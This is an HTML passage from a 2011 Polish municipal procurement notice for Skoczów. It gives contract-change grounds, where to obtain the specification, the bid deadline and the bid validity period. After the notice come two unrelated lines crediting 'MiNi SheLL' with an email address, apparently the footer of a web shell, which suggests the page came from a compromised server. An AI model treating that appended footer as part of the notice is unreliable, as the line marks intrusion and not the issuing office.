b) w przypadku działań osób trzecich uniemożliwiających wykonanie prac, a które to działania nie stanowią winy którejkolwiek ze stron,
c) w przypadku wystąpienia siły wyższej,
d) w przypadku przekształcenia podmiotowego Wykonawcy,
e) w przypadku zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.um.skoczow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Skoczów, ul. Mickiewicza 14, pokój nr 109 (po wcześniejszym uzgodnieniu terminu).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.04.2011 godzina 10:00, miejsce: Urząd Miejski w Skoczowie, Rynek 1, 43-430 Skoczów, pokój nr 2..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com